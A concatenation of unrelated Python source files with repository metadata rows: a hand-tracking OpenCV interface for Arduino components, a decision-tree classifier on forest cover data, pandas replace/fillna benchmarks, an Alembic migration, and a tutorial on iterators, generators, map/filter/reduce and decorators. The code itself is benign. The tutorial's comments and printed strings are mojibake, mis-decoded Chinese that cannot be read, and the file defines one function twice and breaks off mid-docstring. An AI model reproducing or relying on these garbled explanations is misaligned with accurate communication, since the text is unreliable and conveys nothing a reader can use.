previous_thickness, text_content, text_font, text_font_scale, text_color,
text_thickness):
cv2.rectangle(resized_frame, previous_top_left, previous_bottom_right, previous_color, previous_thickness)
text_x = previous_top_left[0] + 10
text_y = previous_top_left[1] + 500
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def detect_finger_inside_next_component(self, landmark_list, next_top_left, next_bottom_right):
global start_time
global end_time
if len(landmark_list) != 0:
if next_top_left[0] <= landmark_list[PINKY_TIP][1] <= next_bottom_right[0] and \
next_top_left[1] <= landmark_list[PINKY_TIP][2] <= next_bottom_right[1]:
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 3
else:
if time.time() > end_time:
start_time = 0
end_time = 0
return 1
def detect_finger_inside_previous_component(self, landmark_list, previous_top_left, previous_bottom_right):
global start_time
global end_time
if len(landmark_list) != 0:
if previous_top_left[0] <= landmark_list[THUMB_TIP][1] <= previous_bottom_right[0] and \
previous_top_left[1] <= landmark_list[THUMB_TIP][2] <= previous_bottom_right[1]:
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 3
else:
if time.time() > end_time:
start_time = 0
end_time = 0
return 1
def resize_window(img, max_width, max_height):
original_height, original_width, _ = img.shape
scale_x = max_width / original_width
scale_y = max_height / original_height
scale = min(scale_x, scale_y)
new_width = int(original_width * scale)
new_height = int(original_height * scale)
return new_width, new_height
def main():
cap = cv2.VideoCapture(0)
success, img = cap.read()
new_width, new_height = resize_window(img, max_width=1680, max_height=1050)
cv2.namedWindow('Scaled Video', cv2.WINDOW_NORMAL)
cv2.resizeWindow('Scaled Video', new_width, new_height)
cv2.setWindowProperty('Scaled Video', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
hand_detector = HandLandmarkDetector(static_image_mode=False, max_num_hands=1, model_complexity=1,
min_detection_confidence=0.1, min_tracking_confidence=0.1)
i = 0
gestureControl = False
rectangle_width = [ARDUINO_WIDTH, LED_WIDTH, LED_BAR_WIDTH]
rectangle_height = [ARDUINO_HEIGHT, LED_HEIGHT, LED_BAR_HEIGHT]
rectangle_top_left_x = [ARDUINO_X, LED_X, LED_BAR_X]
rectangle_top_left_y = [ARDUINO_Y, LED_Y, LED_BAR_Y]
rectangle_color = (0, 0, 255)
rectangle_thickness = 2
hand_tracker = HandTracker(rectangle_width[0], rectangle_height[0], rectangle_top_left_x[0],
rectangle_top_left_y[0], rectangle_color, rectangle_thickness)
component_name = ["Arduino", "LED to PIN D9", "LED bar", "LED dimming"]
object_assembler = ObjectAssembler()
while True:
success, img = cap.read()
resized_frame = cv2.resize(img, (new_width, new_height))
hand_tracker.draw(resized_frame)
resized_frame = hand_detector.draw_hand_landmarks(resized_frame)
landmark_list = hand_detector.find_hand_landmark_coordinates(resized_frame)
if hand_tracker.detect_hand_inside_area(landmark_list) == 1:
hand_tracker.set_green_color()
hand_tracker.set_object_assembled_true()
object_assembler.draw_previous_component(resized_frame=resized_frame, previous_top_left=(1, 1),
previous_bottom_right=(146, 1061), previous_color=(0, 0, 255),
previous_thickness = 20, text_content="Previous",
text_font=cv2.FONT_HERSHEY_SIMPLEX, text_font_scale=1.0,
text_color=(0, 0, 255), text_thickness=2)
object_assembler.draw_next_component(resized_frame=resized_frame, next_top_left=(1250, 1),
next_bottom_right=(1395, 1061), next_color=(0, 255, 0), next_thickness=20,
text_content="Next", text_font=cv2.FONT_HERSHEY_SIMPLEX,
text_font_scale=1.0, text_color=(0, 255, 0), text_thickness=2)
object_assembler.draw_work_area(resized_frame=resized_frame, work_area_top_left=(145, 300),
work_area_bottom_right=(1245, 1050), work_area_color=(255, 255, 255),
work_area_thickness=3, text_content="Work Area",
text_font=cv2.FONT_HERSHEY_SIMPLEX, text_font_scale=1.0,
text_color=(255, 255, 255), text_thickness=2)
object_assembler.draw_breadboard_outline(resized_frame=resized_frame, breadboard_top_left=(550, 400),
breadboard_bottom_right=(850, 850),
breadboard_outline_color=(0, 0, 255), breadboard_outline_thickness=2)
object_assembler.draw_component_area(resized_frame=resized_frame, component_area_top_left=(145, 1),
component_area_bottom_right=(1245, 295),
component_area_color=(255, 255, 255), component_area_thickness=2,
text_content="Component Area", text_font=cv2.FONT_HERSHEY_SIMPLEX,
text_font_scale=1.0, text_color=(255, 255, 255), text_thickness=2)
if object_assembler.detect_finger_inside_next_component(landmark_list, next_top_left=(1250, 1),
next_bottom_right=(1395, 1061)) == 1:
hand_tracker.set_object_assembled_false()
if i < 2:
i = i + 1
hand_tracker.reset_sizes(rectangle_width[i], rectangle_height[i], rectangle_top_left_x[i],
rectangle_top_left_y[i], rectangle_color, rectangle_thickness)
else:
gestureControl = True
if gestureControl == True:
i=3
try:
hand_tracker.gesture_control(landmark_list, resized_frame, arduino)
except UnboundLocalError:
cv2.putText(resized_frame, "Connect the Arduino and restart!", (170, 400), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 0, 255), 6)
except serial.serialutil.SerialException:
cv2.putText(resized_frame, "Connect the Arduino and restart!", (170, 400), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 0, 255), 6)
except NameError:
cv2.putText(resized_frame, "Connect the Arduino and restart!", (170, 400), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 0, 255), 6)
if object_assembler.detect_finger_inside_previous_component(landmark_list, previous_top_left=(1, 1),
previous_bottom_right=(146, 1061)) == 1:
hand_tracker.set_object_assembled_false()
gestureControl = False
if i == 0:
i = 2
else:
i = i - 1
hand_tracker.reset_sizes(rectangle_width[i], rectangle_height[i], rectangle_top_left_x[i],
rectangle_top_left_y[i], rectangle_color, rectangle_thickness)
if hand_tracker.object_assembled == True:
cv2.putText(resized_frame, component_name[i], (650, 280), cv2.FONT_HERSHEY_SIMPLEX, 2.0, (0, 255, 0), 4)
else: cv2.putText(resized_frame, component_name[i], (650, 280), cv2.FONT_HERSHEY_SIMPLEX, 2.0, (0, 0, 255), 4)
cv2.imshow('Scaled Video', resized_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
if __name__ == "__main__":
main()
# counter = 1
# a = 0
# b = 1
# print(a)
# print(b)
#
# while counter < 10:
# c = a+b
# a = b
# b = c
# print(c)
# counter = counter + 1
|
vladpasat/HandFlow0
|
handTrackingModule.py
|
handTrackingModule.py
|
py
| 16,607
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8099648005
|
import pandas as pd
import pydotplus
from IPython.display import Image
from sklearn import metrics
from sklearn.externals.six import StringIO
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, export_graphviz
# names of all columns in the CSV
column_names = ['Elevation', 'Aspect', 'Slope', 'Horizontal_Distance_To_Hydrology', 'Vertical_Distance_To_Hydrology',
'Horizontal_Distance_To_Roadways', 'Hillshade_9am', 'Hillshade_Noon', 'Hillshade_3pm',
'Horizontal_Distance_To_Fire_Points', 'Wilderness_Area1', 'Wilderness_Area2', 'Wilderness_Area3',
'Wilderness_Area4', 'Soil_Type1', 'Soil_Type2', 'Soil_Type3', 'Soil_Type4', 'Soil_Type5', 'Soil_Type6',
'Soil_Type7', 'Soil_Type8', 'Soil_Type9', 'Soil_Type10', 'Soil_Type11', 'Soil_Type12', 'Soil_Type13',
'Soil_Type14', 'Soil_Type15', 'Soil_Type16', 'Soil_Type17', 'Soil_Type18', 'Soil_Type19', 'Soil_Type20',
'Soil_Type21', 'Soil_Type22', 'Soil_Type23', 'Soil_Type24', 'Soil_Type25', 'Soil_Type26', 'Soil_Type27',
'Soil_Type28', 'Soil_Type29', 'Soil_Type30', 'Soil_Type31', 'Soil_Type32', 'Soil_Type33', 'Soil_Type34',
'Soil_Type35', 'Soil_Type36', 'Soil_Type37', 'Soil_Type38', 'Soil_Type39', 'Soil_Type40', 'Cover_Type']
# load the dataset
dataset = pd.read_csv("covtype.csv", header=None, names=column_names)
# split off the feature columns and the target variable
feature_cols = column_names[:-1]
X = dataset[feature_cols]
y = dataset.Cover_Type
# split the dataset into training and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
# train the model
clf = DecisionTreeClassifier()
clf = clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print("Accuracy: {}".format(metrics.accuracy_score(y_test, y_pred)))
dot_data = StringIO()
# generate and export the decision tree graphic
# depth is capped at 5 because larger values take hours to render
export_graphviz(clf, max_depth=5, out_file=dot_data, filled=True, rounded=True, special_characters=True,
feature_names=feature_cols)
print('Graphviz generated')
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
graph.write_png('trees.png')
Image(graph.create_png())
print('End of script.')
|
fedoruka/fct_classification
|
main.py
|
main.py
|
py
| 2,347
|
python
|
en
|
code
| 0
|
github-code
|
6
|
34004358765
|
import numpy as np
import pandas as pd
class FillNa:
params = [True, False]
param_names = ["inplace"]
def setup(self, inplace):
N = 10 ** 6
rng = pd.date_range("1/1/2000", periods=N, freq="min")
data = np.random.randn(N)
data[::2] = np.nan
self.ts = pd.Series(data, index=rng)
def time_fillna(self, inplace):
self.ts.fillna(0.0, inplace=inplace)
def time_replace(self, inplace):
self.ts.replace(np.nan, 0.0, inplace=inplace)
class ReplaceDict:
params = [True, False]
param_names = ["inplace"]
def setup(self, inplace):
N = 10 ** 5
start_value = 10 ** 5
self.to_rep = dict(enumerate(np.arange(N) + start_value))
self.s = pd.Series(np.random.randint(N, size=10 ** 3))
def time_replace_series(self, inplace):
self.s.replace(self.to_rep, inplace=inplace)
class ReplaceList:
# GH#28099
params = [(True, False)]
param_names = ["inplace"]
def setup(self, inplace):
self.df = pd.DataFrame({"A": 0, "B": 0}, index=range(4 * 10 ** 7))
def time_replace_list(self, inplace):
self.df.replace([np.inf, -np.inf], np.nan, inplace=inplace)
def time_replace_list_one_match(self, inplace):
        # the 1 can be held in self._df.blocks[0], while the inf and -inf can't
self.df.replace([np.inf, -np.inf, 1], np.nan, inplace=inplace)
class Convert:
params = (["DataFrame", "Series"], ["Timestamp", "Timedelta"])
param_names = ["constructor", "replace_data"]
def setup(self, constructor, replace_data):
N = 10 ** 3
data = {
"Series": pd.Series(np.random.randint(N, size=N)),
"DataFrame": pd.DataFrame(
{"A": np.random.randint(N, size=N), "B": np.random.randint(N, size=N)}
),
}
self.to_replace = {i: getattr(pd, replace_data) for i in range(N)}
self.data = data[constructor]
def time_replace(self, constructor, replace_data):
self.data.replace(self.to_replace)
from .pandas_vb_common import setup # noqa: F401 isort:skip
|
Tommyhappy01/8-PANDAS
|
asv_bench/benchmarks/replace.py
|
replace.py
|
py
| 2,121
|
python
|
en
|
code
| 4
|
github-code
|
6
|
41682530680
|
"""add directory id to address
Revision ID: 19e625982be8
Revises: a9adfd3c2eba
Create Date: 2018-02-02 23:11:03.395662
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '19e625982be8'
down_revision = 'a9adfd3c2eba'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('address', sa.Column('directory_id', sa.Integer(), nullable=True), schema='monday')
op.create_index(op.f('ix_monday_address_directory_id'), 'address', ['directory_id'], unique=False, schema='monday')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_monday_address_directory_id'), table_name='address', schema='monday')
op.drop_column('address', 'directory_id', schema='monday')
# ### end Alembic commands ###
|
MondayHealth/provider-import
|
alembic/versions/19e625982be8_add_directory_id_to_address.py
|
19e625982be8_add_directory_id_to_address.py
|
py
| 973
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8366348060
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import math
import time
from dataclasses import dataclass
from functools import reduce
from functools import wraps
"""
่ฟญไปฃๅจ
่ฟญไปฃๆฏPythonๆๅผบๅคง็ๅ่ฝไนไธ๏ผๆฏ่ฎฟ้ฎ้ๅๅ
็ด ็ไธ็งๆนๅผใ
่ฟญไปฃๅจๆฏไธไธชๅฏไปฅ่ฎฐไฝ้ๅ็ไฝ็ฝฎ็ๅฏน่ฑกใ
่ฟญไปฃๅจๅฏน่ฑกไป้ๅ็็ฌฌไธไธชๅ
็ด ๅผๅง่ฎฟ้ฎ๏ผ็ดๅฐๆๆ็ๅ
็ด ่ขซ่ฎฟ้ฎๅฎ็ปๆใ่ฟญไปฃๅจๅช่ฝๅพๅไธไผๅ้
่ฟญไปฃๅจๆไธคไธชๅบๆฌ็ๆนๆณ๏ผ
iter() ๅๅปบ่ฟญไปฃๅจ
next() ่ทๅ่ฟญไปฃๅจ็ไธไธไธชๅ
็ด
ๅญ็ฌฆไธฒใๅ่กจใๅ
็ปๅฏน่ฑก ้ฝๅฏ็จไบๅๅปบ่ฟญไปฃๅจ
่ฟญไปฃๅจ็ปๆ็ๅผๅธธ
StopIteration
ๅๅปบ่ฟญไปฃๅจ
ๆไธไธช็ฑปไฝไธบไธไธช่ฟญไปฃๅจไฝฟ็จ้่ฆๅจ็ฑปไธญๅฎ็ฐไธคไธชๆนๆณ__iter__() ไธ __next__()
__iter__()ๆนๆณ่ฟๅไธไธช็นๆฎ็่ฟญไปฃๅจๅฏน่ฑก๏ผ่ฟไธช่ฟญไปฃๅจๅฏน่ฑกๅฎ็ฐไบ__next__()ๆนๆณๅนถ้่ฟStopIterationๅผๅธธๆ ่ฏ่ฟญไปฃ็ๅฎๆใ
__next__()ๆนๆณไผ่ฟๅไธไธไธช่ฟญไปฃๅจๅฏน่ฑก
ๅชๆๅฎ็ฐไบ__iter__()๏ผๆ่ฝๅจไฝฟ็จiter()็ๆถๅๅๅปบไธไธช่ฟญไปฃๅจ
ๅชๆๅฎ็ฐไบ__next__()๏ผๆ่ฝๅจไฝฟ็จnext()็ๆถๅ้่ฟ__next__()ๆ็
ง่งๅ่ทๅไธไธไธชๅผ
ๆณจๆ
ๅชๆๅฎ็ฐไบ__iter__()ๆนๆณ๏ผๆ่ฝไฝฟ็จiter()๏ผๅฏน่ฏฅ็ฑป็ๅฏน่ฑกๅๅปบ่ฟญไปฃๅจใไฝๆฏไธๆฏ่ฏดๅฎ็ฐไบ__iter__()ๆนๆณ๏ผๅฐฑๅทฒ็ปๅๅปบไบ่ฟญไปฃๅจใ่ฟๆฏๅ็ฌ็ๆฆๅฟตใ
ๅชๆๅฎ็ฐไบ__next__()๏ผๆ่ฝๅจไฝฟ็จnext()็ๆถๅ้่ฟ__next__()ๆ็
ง่งๅ่ทๅไธไธไธชๅผใไฝๆฏไธๆฏ่ฏดๆฒกๆๅฎ็ฐ__next__()๏ผๅฐฑไธ่ฝๅๅปบ่ฟญไปฃๅจไบใ
"""
"""
ๅฎ็ฐไบ่ฟญไปฃๅจๅฝๆฐ็็ฑป
"""
class iterationNum:
def __iter__(self):
self.num = 1
# ่ฟญไปฃๅจ่ฟญไปฃ็ๆฏๅฏน่ฑกใๆไปฅ่ฟ้้่ฆ่ฟๅselfใself่กจ็คบๅฏน่ฑก
return self
def __next__(self):
        # save self.num first (it is the value to return), then increment it;
        # otherwise the sequence would start at 2 instead of 1
x = self.num
self.num += 1
return x
"""
่ฟญไปฃๅจ็ๅค็งไฝฟ็จๆนๅผ
"""
def mapLearn():
list = [1, 2, 3, 4] # ๅ่กจ
print("่ฟญไปฃๅจไฝฟ็จๆนๅผ01")
mapL01 = iter(list) # ไฝฟ็จๅ่กจๅๅปบ่ฟญไปฃๅจ
for mapl in mapL01:
# print(mapl)
# ไฝฟ็จendไฟฎๆน่พๅบ็ๆๅๅญ็ฌฆ๏ผ่ฟ้ๅฐๆข่กๆฟๆขไธบ็ฉบๆ ผ
print(mapl, end=" ")
print("่ฟญไปฃๅจไฝฟ็จๆนๅผ02")
# ่ฟญไปฃๅจ่พๅบๅฎๅ๏ผไธ่ฝๅจ็จnext๏ผๅฆๅไผๆฅ้StopIteration
mapL02 = iter(list) # ไฝฟ็จๅ่กจๅๅปบ่ฟญไปฃๅจ
print(next(mapL02))
print(next(mapL02))
print(next(mapL02))
print(next(mapL02))
# print(next(mapL02))
print("่ฟญไปฃๅจไฝฟ็จๆนๅผ03")
mapL03 = iter(list) # ไฝฟ็จๅ่กจๅๅปบ่ฟญไปฃๅจ
# i = True
# while i:
# try:
# mapl03 = next(mapL03)
# print(mapl03)
# except StopIteration:
# i = False
# print("่ฟญไปฃๅจ03ๅทฒ้ๅ็ปๆ")
while True:
try:
print(next(mapL03))
except StopIteration:
print("่ฟญไปฃๅจ03ๅทฒ้ๅ็ปๆ")
break
print("่ฟญไปฃๅจๅฏน่ฑกๅๅปบๅไฝฟ็จ")
itClass = iterationNum()
itN = iter(itClass)
# while True:
# try:
# b = next(itN)
# if b == 10:
# break;
# else:
# print(b)
# except StopIteration:
# break
while True:
try:
print(next(itN))
except StopIteration:
break
"""
็ๆๅจ
็จไบ็ๆ่ฟญไปฃๅจ
ๅจPythonไธญ๏ผไฝฟ็จyield็ๅฝๆฐ่ขซ็งฐไธบ็ๆๅจ(generator)
่ทๆฎ้ๅฝๆฐไธๅ็ๆฏ๏ผ็ๆๅจๆฏไธไธช่ฟๅ่ฟญไปฃๅจ็ๅฝๆฐ๏ผๅช่ฝ็จไบ่ฟญไปฃๆไฝใ
็ฎๅ็่งฃ๏ผ็ๆๅจๅฐฑๆฏไธไธช่ฟญไปฃๅจ
่ฐ็จไธไธช็ๆๅจๅฝๆฐ๏ผ่ฟๅ็ๆฏไธไธช่ฟญไปฃๅจๅฏน่ฑก
ๅจ่ฐ็จ็ๆๅจ่ฟ่ก็่ฟ็จไธญ๏ผๆฏๆฌก้ๅฐyieldๆถๅฝๆฐไผๆๅๅนถไฟๅญๅฝๅๆๆ็่ฟ่กไฟกๆฏ๏ผ่ฟๅyield็ๅผ๏ผๅนถๅจไธไธๆฌกๆง่กnext()ๆนๆณๆถไปๅฝๅไฝ็ฝฎ็ปง็ปญ่ฟ่กใ
ไฝฟ็จyield็ๆ่ฟญไปฃๅจ้่ฆ้
ๅๅพช็ฏไฝฟ็จ
ๆ่ฐ็ๆๅจๅฐฑๆฏๅฉ็จๅพช็ฏๅฐๆไธชๅ้ๆๆไธชๅผๆดๅๅฐไธ่ตท๏ผไฝไธบไธไธช่ฟญไปฃๅจ่ฟๅ
ไนๅฏไปฅ็่งฃไธบๅฐๆณ่ฆ็ๆฐๆดๅๅฐไธ่ตท๏ผไฝไธบไธไธช่ฟญไปฃๅจ่ฟๅ
"""
"""
็ๆๅจๅฝๆฐ
ๆๆณข้ฃๅฅๆฐๅ
"""
def fibonacci(n):
a, b, counter = 0, 1, 0
while True:
if (counter > n):
return
yield a
a, b = b, a + b
counter += 1
"""
็ๆๅจๅฝๆฐ็ปไน
ไฝฟ็จyield็ๆ่ฟญไปฃๅจ๏ผ้่ฆ้
ๅๅพช็ฏไฝฟ็จ
"""
def yieldTest(n):
i = 0
while True:
yield i
if i <= n:
i += 1
else:
return
"""
็ๆๅจ็ไฝฟ็จ็ปไน
"""
def yieldLearn():
print("้่ฟ็ๆๅจๅฎ็ฐ:ๆๆณข้ฃๅฅๆฐๅ")
fi = fibonacci(10)
while True:
try:
print(next(fi))
except StopIteration:
break
print("่ชๅฎไน็ๆๅจๅฎ็ฐ")
yt = yieldTest(10)
while True:
try:
print(next(yt))
except StopIteration:
break
"""
map&filter&reduce
ๅฝๆฐๅผ็ผ็จ็ไปฃ่กจ
ๅ
็ฝฎๅฝๆฐmapๅfilterๆฏๅจๅ่กจ(ๆ็ฑปไผผ็็งฐไธบ่ฟญไปฃ็ๅฏน่ฑก)ไธ่ฟ่ก็้ๅธธๆ็จ็้ซ้ถๅฝๆฐ
ๅฝๆฐmapๆฅๅไธไธชๅฝๆฐๅไธไธช่ฟญไปฃๅจไฝไธบๅๆฐ๏ผๅนถ่ฟๅไธไธชๆฐ็่ฟญไปฃๅจ๏ผ่ฏฅๅฝๆฐๅบ็จไบๆฏไธชๅๆฐ
map()
ไฝฟ็จ่ฟญไปฃๅจๆๆๅฎ่งๅ็ๆ่ฟญไปฃๅจ
ๆ นๆฎๆไพ็ๅฝๆฐๅฏนๆๅฎๅบๅๅๆ ๅฐ
่ฏญๆณ:
map(function, iterable, ...)
ๅๆฐ:
function ๅฝๆฐ
iterable ไธไธชๆๅคไธชๅบๅ
่ฟๅๅผ:
Python2.x ่ฟๅๅ่กจ
Python3.x ่ฟๅ่ฟญไปฃๅจ
่งฃ้๏ผ
็ฌฌไธไธชๅๆฐfunctionไปฅๅๆฐๅบๅiterableไธญ็ๆฏไธไธชๅ
็ด ่ฐ็จfunctionๅฝๆฐ
่ฟๅๅ
ๅซๆฏๆฌกfunctionๅฝๆฐ่ฟๅๅผ็ๆฐๅ่กจ
"""
"""
ๅฝๆฐๅผ็ผ็จmap()้ซ้ถๅฝๆฐ็็ปไน
"""
"""
ๅฎไนไธไธชๅฝๆฐ็จไบๆต่ฏmap
่ฎก็ฎๅนณๆนๆฐ
"""
def square(x):
return x ** 2
"""
map()ไฝฟ็จ็ปไน
"""
def mapLearn():
list = [1, 2, 3, 4, 5]
    # apply square to every element of list and return the results as an iterator
print("ไฝฟ็จๅฝๆฐๅฎ็ฐmap()")
mL01 = map(square, list)
for ml in mL01:
print(ml)
# ไฝฟ็จlambdaๅฎ็ฐ
print("ไฝฟ็จlambda่กจ่พพๅผๅฎ็ฐmap()")
mL02 = map(lambda x: x ** 2, list)
while True:
try:
print(next(mL02))
except StopIteration:
break
"""
ไฝฟ็จไธคไธชๅ่กจไฝไธบไธคไธชๅๆฐ
ไฝฟ็จlambdaๆฅๅไธคไธชๅๆฐ่ฟ่กmap()่ฎก็ฎ
"""
print("ไฝฟ็จlambda่ฎก็ฎไธคไธช่ฟญไปฃๅจๅฎ็ฐmap()")
listX = [1, 2, 3, 4, 5]
listY = [-1, -2, -3, -4, -5]
mL03 = map(lambda x, y: x + y, listX, listY)
for ml03 in mL03:
print(ml03)
"""
filter()
filter()ๅฝๆฐ็จไบ่ฟๆปคๅบๅ๏ผ่ฟๆปคๆไธ็ฌฆๅๆกไปถ็ๅ
็ด ๏ผ่ฟๅ็ฑ็ฌฆๅๆกไปถๅ
็ด ็ปๆ็ๆฐๅ่กจ
่ฏญๆณ๏ผ
filter(function, iterable)
ๅๆฐ๏ผ
function ๅคๆญๅฝๆฐ
iterable ๅฏ่ฟญไปฃๅฏน่ฑก
่ฟๅๅผ๏ผ
Python2.x ่ฟๅๅ่กจ
Python3.x ่ฟๅๅฏ่ฟญไปฃๅฏน่ฑก
่งฃ้๏ผ
ๆฅๆถไธคไธชๅๆฐ๏ผ็ฌฌไธไธชๆฏๅฝๆฐ๏ผ็ฌฌไบไธชๆฏๅบๅ๏ผๅบๅ็ๆฏไธชๅ
็ด ไฝไธบๅๆฐไผ ้็ปๅฝๆฐ่ฟ่กๅคๆญใ
็ถๅ่ฟๅTrueๆFalse๏ผๆๅๅฐ่ฟๅTrue็ๅ
็ด ๆพๅฐๆฐๅ่กจไธญ
"""
"""
ๅฝๆฐๅผ็ผ็จfilter()้ซ้ถๅฝๆฐ็็ปไน
"""
"""
ๅฎไนไธไธชๅฝๆฐ็จไบๆต่ฏfilter
ๅคๆญๆฏๅฆๅๆฐ
"""
def isOdd(n):
return n % 2 == 1
"""
filterไฝฟ็จ็ปไน
"""
def filterLearn():
list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print("ไฝฟ็จๅฝๆฐๅฎ็ฐfilter")
fL01 = filter(isOdd, list)
for fl in fL01:
print(fl)
print("ไฝฟ็จlambdaๅฎ็ฐfilter")
fL02 = filter(lambda x: x % 2 == 1, list)
while True:
try:
print(next(fL02))
except StopIteration:
break
print("ไฝฟ็จfilter่ฟๆปค้ค1~100ไธญๅนณๆนๆ นๆฏๆดๆฐ็ๆฐ")
fL03 = filter(lambda x: math.sqrt(x) % 1 == 0, range(1, 101, 1))
for fl03 in fL03:
print(fl03)
"""
reduce()
reduce()ๅฝๆฐไผๅฏนๅๆฐๅบๅไธญๅ
็ด ่ฟ่ก็ดฏ็งฏ
่ฏญๆณ๏ผ
reduce(function, iterable[, initializer])
ๅๆฐ๏ผ
function ๅฝๆฐ๏ผๆไธคไธชๅๆฐ
iterable ๅฏ่ฟญไปฃๅฏน่ฑก
initializer ๅฏ้๏ผๅๅงๅๆฐ
่ฟๅๅผ๏ผ
ๅฝๆฐ่ฎก็ฎ็ปๆ
่งฃ้๏ผ
ๅฝๆฐๅฐไธไธชๆฐๆฎ้ๅ(้พ่กจ๏ผๅ
็ป็ญ)ไธญ็ๆๆๆฐๆฎ่ฟ่กไธๅๆไฝ๏ผ
็จไผ ็ปreduceไธญ็ๅฝๆฐfunction(ๆไธคไธชๅๆฐ)ๅ
ๅฏน้ๅไธญ็็ฌฌ1ใ2ไธชๅ
็ด ่ฟ่กๆไฝ
ๅพๅฐ็็ปๆๅไธ็ฌฌไธไธชๆฐๆฎ็จfunctionๅฝๆฐ่ฟ็ฎ๏ผๆๅๅพๅฐไธไธช็ปๆ
ไนๅฐฑๆฏ่ฏดๆiterableไธญ็ๆๆๅผ่ฟ่กfunction่ฎก็ฎ๏ผๅพๅฐไธไธช่ฎก็ฎ็ปๆ
ๆณจๆ๏ผ
Python3.x reduce()ๅทฒ็ป่ขซ็งปๅจๅฐfunctoolsๆจกๅ้๏ผๅฆๆ่ฆไฝฟ็จ๏ผ้่ฆๅผๅ
ฅfunctoolsๆจกๅๆฅ่ฐ็จreduce()ๅฝๆฐ
from functools import reduce
"""
"""
ๅฝๆฐๅผ็ผ็จreduce()้ซ้ถๅฝๆฐ็็ปไน
"""
"""
ๅฎไนไธไธชๅฝๆฐ็จไบๆต่ฏreduce
ๅ ๆณ
"""
def addRed(x, y):
return x + y
"""
reduceไฝฟ็จ็ปไน
"""
def reduceLearn():
list = [1, 2, 3, 4, 5]
rL01 = reduce(addRed, list)
print("ไฝฟ็จๅฝๆฐๅฎ็ฐreduce")
print(rL01)
print("ไฝฟ็จlambdaๅฎ็ฐreduce")
rL02 = reduce(lambda x, y: x + y, list)
print(rL02)
print("ไฝฟ็จreduce่ฎก็ฎ1-100็ๅ")
rL03 = reduce(lambda x, y: x + y, range(1, 101, 1))
print(rL03)
print("ไฝฟ็จreduce่ฎก็ฎ1-100็็งฏ")
rL04 = reduce(lambda x, y: x * y, range(1, 101, 1))
print(rL04)
"""
่ฃ
้ฅฐๅจ
่ฃ
้ฅฐๅจ(Decorators)ๆฏPython็ไธไธช้่ฆ้จๅใ
็ฎๅ็่ฏด๏ผไปไปฌๆฏไฟฎๆนๅ
ถไปๅฝๆฐ็ๅ่ฝ็ๅฝๆฐใ
ๆๅฉไบ่ฎฉไปฃ็ ๆด็ฎๅ๏ผๆดPythonic(Python่ๅฟ)ใ
้่ฆ็ฅ้ๅจๅช้ไฝฟ็จ่ฃ
้ฅฐๅจ๏ผไปฅๅๅฆไฝๅผๅ่ฃ
้ฅฐๅจใ
่ฃ
้ฅฐๅจๆฏๅพๅจไธไธชๅฝๆฐ็ๅๅๆง่กไปฃ็
ๅทฅๅๆจกๅผ๏ผ
่ฃ
้ฅฐๅจๅฉๅ็จๆดๅฐใๆด็ฎๅ็ไปฃ็ ๆฅๅฎ็ฐๅคๆ็้ป่พ๏ผๅนถๅจๅ
ถไปๅฐๆนๅฎ็ฐ้็จใ
่ฃ
้ฅฐๅจๅฐฑๆฏๅฎไนไธไธชๅตๅฅๅฝๆฐ๏ผๅทฒไธไธชๅฝๆฐไฝไธบๅๆฐ๏ผๅจๅตๅฅๅฝๆฐไธญๆๅๆฐๅฝๆฐๅๅๅ ไธไธ่ฏญๅฅ๏ผ็ถๅๆๅตๅฅๅฝๆฐไฝไธบ่ฟๅๅผใ่ฟๆ ทๅฐฑ็ธๅฝไบไฟฎๆนไบๅๆฐๅฝๆฐ็ๅ่ฝ
ๆณจๆ๏ผ
่ฃ
้ฅฐๅจๅฏไปฅไฝฟ็จ็ฑป็ๆนๅผๅฎ็ฐใๅจ็ฑปไธญ็จไธ้ข็ๅฝๆฐๅๆ ่ฎฐๅฎ็ฐ่ฃ
้ฅฐๅจ็ฑป
__call__
@wraps(func)
่ฃ
้ฅฐๅจๅ
่ฃ
functools.wraps ่ฃ
้ฅฐๅจไฟฎ้ฅฐๅฝๆฐ
@wraps
ๆฅๅไธไธชๅฝๆฐๆฅ่ฟ่ก่ฃ
้ฅฐ๏ผๅนถๅ ๅ
ฅไบๅคๅถๅฝๆฐๅ็งฐใๆณจ้ๆๆกฃใๅๆฐๅ่กจ็ญๅ่ฝใ
่ฟๅฏไปฅ่ฎฉๆไปฌๅจ่ฃ
้ฅฐๅจ้้ข่ฎฟ้ฎๅจ่ฃ
้ฅฐไนๅ็ๅฝๆฐ็ๅฑๆง
@่ฃ
้ฅฐๅจๅ็งฐ
ๅจๅฝๆฐๅ้ขๅ @+่ฃ
้ฅฐๅจๅ็งฐ๏ผ่กจ็คบไฝฟ็จๆๅฎ็่ฃ
้ฅฐๅจๅฏน่ฏฅๅฝๆฐ่ฟ่ก่ฃ
้ฅฐใ
ๅจๅ้ขไฝฟ็จ่ฏฅๅฝๆฐ็ๆฏ๏ผๅฐฑๆฏๅทฒ็ป็ป่ฟ่ฃ
้ฅฐ็ๅ่ฝไบ
่ฃ
้ฅฐๅจๅธธ็จๅฎ็ฐ
ๆๆๆฃๆฅ
ๆฅๅฟๅฎ็ฐ
่ฃ
้ฅฐๅจ็ฑป
ๅ้้ฎไปถ
...
่ฃ
้ฅฐๅจๅฎไนๅไฝฟ็จๆ ๅ่ฏญๅฅ
from functools import wraps
def decorator_name(f):
@wraps(f)
def decorated(*args, **kwargs):
if not can_run:
return "Function will not run"
return f(*args, **kwargs)
return decorated
@decorator_name
def func():
return("Function is running")
can_run = True
